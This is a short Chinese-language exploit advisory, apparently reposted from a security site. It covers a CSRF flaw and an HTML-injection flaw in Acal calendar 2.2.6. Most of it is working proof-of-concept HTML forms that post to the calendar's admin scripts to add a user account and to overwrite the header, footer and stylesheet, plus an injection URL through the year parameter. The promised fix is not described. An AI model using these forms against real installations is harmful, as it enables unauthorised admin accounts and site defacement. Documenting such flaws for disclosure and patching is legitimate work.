标题: [Acal calendar 2.2.6 CSRF Vulnerability] 作者: [Number 7] 下载 地址: [http://sourceforge.net/projects/acalproj/files/latest/download?source=directory] 影响版本: [2.2.6] 测试平台: [Windows, Linux ] ____________________________________________________________________________ 添加账号<br> <form method="post" action="http://localhost/ACal-2.2.6/calendar/admin/changelogin.php?action=add"><br> Username: <br> <input type="text" size="20" name="user" /><br> Password:<br> <input type="password" size="20" name="pass" /> <input type="submit" value="Add User" /></form> Edit/Add Header <form action="http:// www.2cto.com /ACal-2.2.6/calendar/admin/edit.php?edit=header" method="post"> <textarea cols="60" rows="14" name="header">Write New Header Here.</textarea> <input type="submit" value="Submit Changes" /> Edit/Add Footer <form action="http://localhost/ACal-2.2.6/calendar/admin/edit.php?edit=footer" method="post"> <textarea cols="60" rows="14" name="footer">Write New Footer Here.</textarea> <input type="submit" value="Submit Changes" /> </form> Style Options <form method="post" action="http://localhost/ACal-2.2.6/calendar/admin/style.php?edit=style"> <textarea name="stylesheet" cols="60" rows="20"></textarea> <input type="submit" value="Edit" /> HTML注射: http://localhost/ACal-2.2.6/calendar/calendar.php?year=Inject HTML Code here. ____________________________________________________________________________ www.2cto.com提供修复: 针对性修复
查看更多关于Acal calendar 2.2.6 CSRF缺陷及修复 - 网站安全 - 自学的详细内容...